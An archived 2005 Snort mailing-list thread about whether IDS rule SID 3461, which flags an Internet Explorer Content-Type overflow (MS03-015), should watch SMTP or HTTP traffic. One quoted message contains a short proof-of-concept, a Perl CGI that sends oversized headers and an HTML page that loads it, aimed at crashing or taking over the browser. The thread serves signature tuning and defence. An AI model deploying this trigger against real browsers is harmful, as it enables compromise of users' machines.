Snort mailing list archives
Re: SMTP Content - Type overflow attempt SID 3461
From: hchlai () netscape net
Date: Tue, 25 Oct 2005 15:47:04 -0400
Why should we concern about a vulnerable machine that is located on the "$EXTERNAL_NET"?? Shouldn't this signature be written the other way around and detect $SMTP_SERVERS 25 -> $EXTERNAL_NET any instead? HinSuk -----Original Message----- From: Alex Kirk <alex.kirk () sourcefire com> To: Craig Mueller <cmueller () alebra com> Cc: snort-users () lists sourceforge net Sent: Mon, 26 Sep 2005 12:37:54 -0400 Subject: Re: [Snort-users] SMTP Content-Type overflow attempt SID 3461 The rule looks for traffic on port 25 because it's possible to exploit this vulnerability via an HTML e-mail message (since Outlook uses IE to do HTML rendering). Rules for web-based attacks exist in the Community rules as SIDs 100000118 and 100000119. Alex Kirk Research Analyst Sourcefire, Inc.
I've seen the following alert triggered [**] [1:3461:2] SMTP Content-Type overflow attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] > 09/25-11:11:06.816693 x.y.z.1:35499 -> 192.168.1.10:25 TCP TTL:240 TOS:0x10 ID:0 IpLen:20 DgmLen:2776 ***AP*** Seq: 0xCE9CF6A4 Ack: 0xDEEA2DBD Win: 0x40B0 TcpLen: 20 [Xref => > http://www.microsoft.com/technet/security/bulletin/MS03-015.mspx][Xref > => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2003-0113][Xref => > http://www.securityfocus.com/bid/7419] Yet the Microsoft fix is for Internet Explorer, yet the signature > looks for traffic on port TCP / 25. I think the signature should look > for this exploit on TCP port 80 Attached is the sample exploit, which would also only effect port 80.. !/usr/bin/perl # # Name this file as "urlmon-bo.cgi" # $LONG="A"x300; print "Content-type: $LONG\r\n"; print "Content-encoding: $LONG\r\n"; print "\r\n"; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8- - <html> <body> <img src="urlmon-bo.cgi"> </body> </html>
------------------------------------------------------- SF.Net email is sponsored by: Tame your development challenges with Apache's Geronimo App Server. Download it for free - -and be entered to win a 42" plasma tv or your very own Sony(tm)PSP. Click here to play: http://sourceforge.net/geronimo.php _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users __________________________________________________________________ Look What The New Netscape.com Can Do! Now you can preview dozens of stories and have the ones you select delivered to you without ever leaving the Top Home Page. And the new Tool Box gives you one click access to local Movie times, Maps, White Pages and more. See for yourself at http://netcenter.netscape.com/netcenter/
Current thread:
- Re: SMTP Content - Type overflow attempt SID 3461 hchlai (Oct 25)